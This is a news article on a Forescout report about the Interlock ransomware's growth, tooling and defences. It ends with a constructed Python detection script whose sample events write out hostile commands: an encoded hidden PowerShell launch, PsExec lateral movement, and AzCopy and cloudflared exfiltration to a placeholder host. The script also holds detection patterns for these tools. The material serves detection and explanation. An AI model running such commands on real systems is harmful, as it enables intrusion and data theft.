- The Interlock ransomware has reached operational maturity and is now targeting the healthcare, government and manufacturing sectors.
- It supports multi-platform attacks, cloud-based C2 and automation of the full attack lifecycle.
- Forescout calls for early detection, behavioral analytics and access control to reduce risk.
Interlock ransomware is no longer a mid-tier credential stealer. It has grown into a sophisticated, multi-platform, cloud-enabled ransomware enterprise with affiliates, automation and professional operations.
This is according to a new report from Forescout security researchers, who have been tracking Interlock since it first appeared in mid-2024.
The Forescout report states that Interlock entered “operational maturity” (Phase 3) in February 2025, becoming capable of attacking high-value targets in sectors such as healthcare, government and manufacturing.
Operational maturity stage
At the operational maturity stage, Interlock began to act as a business platform, allowing affiliates or partner groups to conduct attacks under its name. It has also integrated the full attack lifecycle and no longer relies on fragmented or experimental methods: everything from initial access and lateral movement to data theft and encryption can be done with Interlock's own tooling.
The ransomware has been expanded to target not only Windows systems but also Linux, BSD and VMware ESXi servers, and now uses legitimate cloud services for command and control (C2) and data exfiltration, including Cloudflare tunnels and Azure's AzCopy utility.
The group has moved from fake browser-update pages to impersonating business software such as FortiClient or Cisco AnyConnect, and has adopted newer social-engineering lures such as ClickFix and FileFix. Affiliates have also bought credentials from initial access brokers, giving them immediate privileged access. They then used tools such as Cobalt Strike, SystemBC, PuTTY, PsExec and Posh-SSH to move laterally and control systems across the network.
The platform has also improved its resilience and stealth, and now exfiltrates stolen data to cloud storage. Its ransom notes have become more professional, reading more like corporate "incident alerts," Forescout added, with the emphasis now on making negotiations effective:
“The tone of communication is typical of business-focused ransomware operations, with emphasis placed on this being a 'security alert' rather than a failure, although communications highlight the consequences of non-payment, including legal liability for disclosing customer data and regulatory penalties under GDPR, HIPAA or other frameworks,” the report highlights.
To defend against Interlock, Forescout recommends focusing on early detection of ransomware behavior and reducing the attack surface. This includes using risk-based conditional access policies, implementing behavioral analytics, monitoring PowerShell activity, looking for anomalies in authentication logs, and watching for signs of lateral movement.
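As an added illustration of what those recommendations look like in practice (this is constructed example code, not Forescout's or Interlock's), the following rule pass scans a handful of made-up endpoint events for the behaviours the report names: execution of AzCopy, cloudflared, PsExec or PuTTY, suspicious PowerShell invocations, and one account performing network logons to several hosts in a row. Event names, fields and the lateral-movement threshold are assumptions for the example.

```python
"""Constructed example (not Forescout's or Interlock's code): a small rule pass over
endpoint telemetry for behaviours the Interlock report flags. Sample data is made up."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: str      # HH:MM:SS
    host: str    # endpoint that produced the event
    user: str    # account in the event
    kind: str    # "proc" (process creation), "logon" (successful logon), "ps" (PowerShell script block)
    detail: str  # command line, logon metadata, or script text


# Tools the article names (AzCopy, Cloudflare tunnels, PsExec, PuTTY/Posh-SSH),
# matched on the process image or command line.
TOOLING = re.compile(r"\b(azcopy|cloudflared|psexec|psexesvc|putty|plink|posh-ssh)\b", re.I)

# Common PowerShell abuse markers: encoded command, hidden window, no profile,
# download cradles and an AMSI-tampering string.
PS_SUSPICIOUS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop(rofile)?\b|IEX\b|Invoke-Expression|"
    r"DownloadString|DownloadFile|amsiutils|bypass)", re.I)

NET_LOGON = re.compile(r"\btype=3\b")  # Windows logon type 3 = network logon (SMB, PsExec, WinRM)

# Constructed telemetry: j.doe is a normal user; svc_backup behaves like a compromised
# service account moving laterally with PsExec and then exfiltrating via AzCopy/cloudflared.
SAMPLE_EVENTS = [
    Event("09:00:01", "WS01", "j.doe", "logon", "src=10.0.0.5 type=2"),
    Event("09:05:10", "WS01", "j.doe", "proc", r"C:\Windows\System32\notepad.exe"),
    Event("09:06:00", "WS01", "j.doe", "ps", "Get-ChildItem C:\\Users\\j.doe\\Documents"),
    Event("09:12:44", "WS01", "svc_backup", "ps", "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A"),
    Event("09:13:02", "WS01", "svc_backup", "proc", r"C:\Tools\PsExec.exe \\SRV01 -s cmd.exe"),
    Event("09:13:30", "SRV01", "svc_backup", "logon", "src=10.0.0.20 type=3"),
    Event("09:14:01", "SRV02", "svc_backup", "logon", "src=10.0.0.20 type=3"),
    Event("09:14:40", "SRV03", "svc_backup", "logon", "src=10.0.0.20 type=3"),
    Event("09:20:00", "SRV03", "svc_backup", "proc",
          r"azcopy.exe copy D:\Finance https://example.blob.core.windows.net/c?sig=REDACTED --recursive"),
    Event("09:21:00", "SRV03", "svc_backup", "proc", r"cloudflared.exe tunnel run --token REDACTED"),
]


def detect(events, lateral_threshold=3):
    """Return a list of alert dicts. lateral_threshold (assumed value) is the number
    of distinct hosts one account may reach via network logon before it is flagged."""
    alerts = []
    net_logons = defaultdict(set)  # user -> hosts reached with type-3 logons

    for e in events:
        if e.kind == "proc" and (m := TOOLING.search(e.detail)):
            alerts.append({"rule": "tooling", "user": e.user, "host": e.host,
                           "match": m.group(1).lower()})
        elif e.kind == "ps" and (m := PS_SUSPICIOUS.search(e.detail)):
            alerts.append({"rule": "powershell", "user": e.user, "host": e.host,
                           "match": m.group(1)})
        elif e.kind == "logon" and NET_LOGON.search(e.detail):
            net_logons[e.user].add(e.host)

    # Authentication-log anomaly: one account fanning out to many hosts over the network.
    for user, hosts in net_logons.items():
        if len(hosts) >= lateral_threshold:
            alerts.append({"rule": "lateral_movement", "user": user,
                           "host": ",".join(sorted(hosts)), "match": f"{len(hosts)} hosts"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['rule']}] user={a['user']} host={a['host']} match={a['match']}")
```

The per-event rules are only as good as their patterns, which is why the account fan-out rule is there as well: a renamed PsExec binary dodges the tooling regex but still leaves a trail of type-3 logons from one source, which is the kind of behavioral signal the report recommends alerting on.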